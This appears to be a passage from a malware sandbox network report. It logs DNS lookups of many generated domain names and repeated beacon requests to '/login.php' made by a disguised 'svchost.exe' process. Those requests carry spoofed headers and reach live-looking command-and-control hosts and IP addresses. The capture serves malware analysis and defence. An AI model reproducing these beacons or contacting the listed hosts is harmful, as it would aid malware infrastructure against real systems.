                                                                                                                                                                                                              Aug 23, 2024 18:49:04.316864967 CEST1.1.1.1192.168.2.40x1abaName error (3)vopydek.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.317944050 CEST1.1.1.1192.168.2.40x6425Name error (3)pujymip.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.317955017 CEST1.1.1.1192.168.2.40x2b53Name error (3)gatydaw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.327116966 CEST1.1.1.1192.168.2.40x98c9Name error (3)vocykem.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.327192068 CEST1.1.1.1192.168.2.40xb349Name error (3)puzyjoq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.327202082 CEST1.1.1.1192.168.2.40x7154Name error (3)qetysal.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.327322006 CEST1.1.1.1192.168.2.40xd1f0Name error (3)pufybyv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.327332020 CEST1.1.1.1192.168.2.40x37e6Name error (3)gadyveb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.329741001 CEST1.1.1.1192.168.2.40x8432Name error (3)volyjok.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.329751015 CEST1.1.1.1192.168.2.40x8f49Name error (3)lymytux.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.329758883 CEST1.1.1.1192.168.2.40x7426Name error (3)galyhiw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.329767942 CEST1.1.1.1192.168.2.40x4847Name error (3)vonyryc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.330019951 CEST1.1.1.1192.168.2.40xdf6cName error (3)qekyhil.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.331509113 CEST1.1.1.1192.168.2.40xba52Name error (3)ganyrys.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.331518888 CEST1.1.1.1192.168.2.40x8d4cName error (3)lyvywed.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.331526995 CEST1.1.1.1192.168.2.40xa207Name error (3)qebyrev.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.332973003 CEST1.1.1.1192.168.2.40x3dd5Name error (3)qebylug.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.332988977 CEST1.1.1.1192.168.2.40x1380Name error (3)vojygut.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.334167957 CEST1.1.1.1192.168.2.40x6e16Name error (3)vowyzuk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.334178925 CEST1.1.1.1192.168.2.40x612eName error (3)lyryxij.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.334757090 CEST1.1.1.1192.168.2.40xf988Name error (3)lygyfex.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.334768057 CEST1.1.1.1192.168.2.40x8ec8Name error (3)qegyfyp.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.335485935 CEST1.1.1.1192.168.2.40x8bd8Name error (3)puryxuq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.335498095 CEST1.1.1.1192.168.2.40xd9e1Name error (3)gacyqob.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.335746050 CEST1.1.1.1192.168.2.40xd3b3Name error (3)vofydac.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.335937977 CEST1.1.1.1192.168.2.40xddb0Name error (3)pufydep.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.336170912 CEST1.1.1.1192.168.2.40xed7aName error (3)lyxymin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.336287975 CEST1.1.1.1192.168.2.40x26a3Name error (3)puzymig.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.337342978 CEST1.1.1.1192.168.2.40x3e00Name error (3)gadydas.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.344126940 CEST1.1.1.1192.168.2.40xc0f2No error (0)lysyvan.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.344126940 CEST1.1.1.1192.168.2.40xc0f2No error (0)lysyvan.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.346472025 CEST1.1.1.1192.168.2.40xc375Name error (3)vowypit.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.346601009 CEST1.1.1.1192.168.2.40xf7faName error (3)pumytup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.346914053 CEST1.1.1.1192.168.2.40xc46aName error (3)puvylyg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.347012997 CEST1.1.1.1192.168.2.40x2832Name error (3)gaqypiz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.347023010 CEST1.1.1.1192.168.2.40xb9b7Name error (3)qeqytup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.347158909 CEST1.1.1.1192.168.2.40x7691Name error (3)qegynuv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.347167969 CEST1.1.1.1192.168.2.40x39e3Name error (3)lygynud.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.347176075 CEST1.1.1.1192.168.2.40xd76eName error (3)purypol.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.347487926 CEST1.1.1.1192.168.2.40xa1daName error (3)qedyveg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.355380058 CEST1.1.1.1192.168.2.40x1663Name error (3)pujygul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.355482101 CEST1.1.1.1192.168.2.40x6cbbName error (3)vofybyf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.355493069 CEST1.1.1.1192.168.2.40xf53eName error (3)gahynus.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.358375072 CEST1.1.1.1192.168.2.40x9a8bName error (3)qexykaq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.358383894 CEST1.1.1.1192.168.2.40x795fName error (3)gatycoh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.358392954 CEST1.1.1.1192.168.2.40x5cd7Name error (3)vopycom.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.358401060 CEST1.1.1.1192.168.2.40x6bf2Name error (3)puvywav.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.358409882 CEST1.1.1.1192.168.2.40x617fName error (3)qetyxiq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.358418941 CEST1.1.1.1192.168.2.40x3c05Name error (3)gahyfyz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.358428001 CEST1.1.1.1192.168.2.40xb5cfName error (3)gaqyzuw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.358515978 CEST1.1.1.1192.168.2.40xd070Name error (3)lymylyr.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.358525038 CEST1.1.1.1192.168.2.40x6867Name error (3)volymum.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.358531952 CEST1.1.1.1192.168.2.40x792fName error (3)vocyqaf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.360537052 CEST1.1.1.1192.168.2.40x5bedName error (3)qexyqog.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.363696098 CEST1.1.1.1192.168.2.40x2b10Name error (3)qeqylyl.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.375580072 CEST1.1.1.1192.168.2.40x4e75No error (0)lysyvan.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.375580072 CEST1.1.1.1192.168.2.40x4e75No error (0)lysyvan.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.464183092 CEST1.1.1.1192.168.2.40xd923No error (0)pupycag.com18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.473449945 CEST1.1.1.1192.168.2.40xcab4Name error (3)lyxyjaj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.473612070 CEST1.1.1.1192.168.2.40x29c4Name error (3)gacykeh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.476619959 CEST1.1.1.1192.168.2.40xfe34Name error (3)lyvylyn.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.478456020 CEST1.1.1.1192.168.2.40x96f2Name error (3)vojymic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.482800007 CEST1.1.1.1192.168.2.40xa376Name error (3)lykygur.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.485553026 CEST1.1.1.1192.168.2.40xb898No error (0)pupydeq.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.485553026 CEST1.1.1.1192.168.2.40xb898No error (0)pupydeq.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.520848989 CEST1.1.1.1192.168.2.40xbfc7No error (0)pupydeq.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.520848989 CEST1.1.1.1192.168.2.40xbfc7No error (0)pupydeq.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.585969925 CEST1.1.1.1192.168.2.40x2601No error (0)pupycag.com18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.714740038 CEST1.1.1.1192.168.2.40x8521No error (0)lyrysor.comzz1985.qu200.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.714740038 CEST1.1.1.1192.168.2.40x8521No error (0)zz1985.qu200.comgtm-sg-6l13ukk0m05.qu200.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.714740038 CEST1.1.1.1192.168.2.40x8521No error (0)gtm-sg-6l13ukk0m05.qu200.com103.150.11.230A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:05.473535061 CEST1.1.1.1192.168.2.40x24c8No error (0)lyrysor.comzz1985.qu200.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:05.473535061 CEST1.1.1.1192.168.2.40x24c8No error (0)zz1985.qu200.comgtm-sg-6l13ukk0m05.qu200.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:05.473535061 CEST1.1.1.1192.168.2.40x24c8No error (0)gtm-sg-6l13ukk0m05.qu200.com103.150.11.230A (IP address)IN (0x0001)false
                                                                                                                                                                                                              • www.google.comuser-agent:
                                                                                                                                                                                                                • qegyhig.com
                                                                                                                                                                                                                • lysyvan.com
                                                                                                                                                                                                                • gahyqah.com
                                                                                                                                                                                                                • lyvyxor.com
                                                                                                                                                                                                                • qetyfuv.com
                                                                                                                                                                                                                • puzylyp.com
                                                                                                                                                                                                                • galyqaz.com
                                                                                                                                                                                                                • vocyzit.com
                                                                                                                                                                                                                • vonypom.com
                                                                                                                                                                                                                • lymyxid.com
                                                                                                                                                                                                                • vojyqem.com
                                                                                                                                                                                                                • lysyfyj.com
                                                                                                                                                                                                                • www.gahyqah.com
                                                                                                                                                                                                                • gatyfus.com
                                                                                                                                                                                                                • ww3.galyqaz.com
                                                                                                                                                                                                                • gadyniw.com
                                                                                                                                                                                                                • pupydeq.com
                                                                                                                                                                                                                • pupycag.com
                                                                                                                                                                                                                • lyrysor.com
                                                                                                                                                                                                                • 106.15.137.66:8001
                                                                                                                                                                                                                • galynuh.com
                                                                                                                                                                                                                • gadyciz.com
                                                                                                                                                                                                                • vofycot.com
                                                                                                                                                                                                                • lyxynyx.com
                                                                                                                                                                                                                • qegyval.com
                                                                                                                                                                                                                • ww16.vofycot.com
                                                                                                                                                                                                                • ww25.lyxynyx.com
                                                                                                                                                                                                                • qetyhyg.com
                                                                                                                                                                                                                • gatyhub.com
                                                                                                                                                                                                                • lygyvuj.com
                                                                                                                                                                                                                • gahyhiz.com
                                                                                                                                                                                                                • qexyhuv.com
                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              0192.168.2.449731188.114.96.3806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.753926039 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qegyhig.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.518945932 CEST797INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:47:01 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Location: https://qegyhig.com/login.php
                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RSpO%2FKj%2BmaUX70Sx1ww44N%2BZ5WzqsjqV7mcRu03L2G1GhX8frrgSp7mIaB8rplocEY4pKTBHaM%2F9%2FhRa1v32FF8dlS%2Bf6NALFr1DXNcREasIqWKIADXoWlsrHPg4sw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8b7c95006e8043b1-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
                                                                                                                                                                                                              Aug 23, 2024 18:47:02.889772892 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qegyhig.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:03.985028982 CEST791INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:47:03 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Location: https://qegyhig.com/login.php
                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lkARy6yodomNNBXrkSLWybUlu6UF7FxoOIYwnOeKElWTTN%2Bj2wHm3NYKdyuJnRkqol85EVky7pfU6te9J3ngXdcGY6xBjUrH2wL%2BU4wAeml%2BjBA6B8xDksyAbIuPSw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8b7c950badd343b1-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.468729973 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qegyhig.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.839237928 CEST793INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:47:51 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Location: https://qegyhig.com/login.php
                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G574r9aE%2Fs%2BgaHvqI7SdEVGdVzvsXLj4kLT0B7f63KKo14PigfEvJGPLZAaVcragpK74TTwnx7%2FwmRyxc0cor1q2sixsOVGgYfYhh4%2FgiaH2rCYsToffq77cGlm0Jw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8b7c963b095143b1-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
                                                                                                                                                                                                              Aug 23, 2024 18:47:53.028350115 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qegyhig.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:53.392613888 CEST797INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:47:53 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Location: https://qegyhig.com/login.php
                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=COGxsqIa016UoHHkGcgN6ui9paZh6Faw2qKn2d%2BVQZqrrEc%2Fd9eBPGcs6rLqSLDFh7dwCYCO1kGE76nlCE%2Bp2RZkAz3ckr%2F%2BVCPpoDJuMEwR39ke14FLoQzgVAIq%2FQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8b7c9644bd5e43b1-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              1192.168.2.449732162.255.119.102806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.843699932 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gahyqah.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.607887983 CEST303INHTTP/1.1 302 Found
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:47:01 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                              Content-Length: 55
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Location: http://www.gahyqah.com/login.php
                                                                                                                                                                                                              X-Served-By: Namecheap URL Forward
                                                                                                                                                                                                              Server: namecheap-nginx
                                                                                                                                                                                                              Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 67 61 68 79 71 61 68 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                                                                                                                                                              Data Ascii: <a href='http://www.gahyqah.com/login.php'>Found</a>.


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              2192.168.2.449733208.100.26.245806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.931417942 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lyvyxor.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.471458912 CEST744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:47:01 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                              Connection: keep-alive
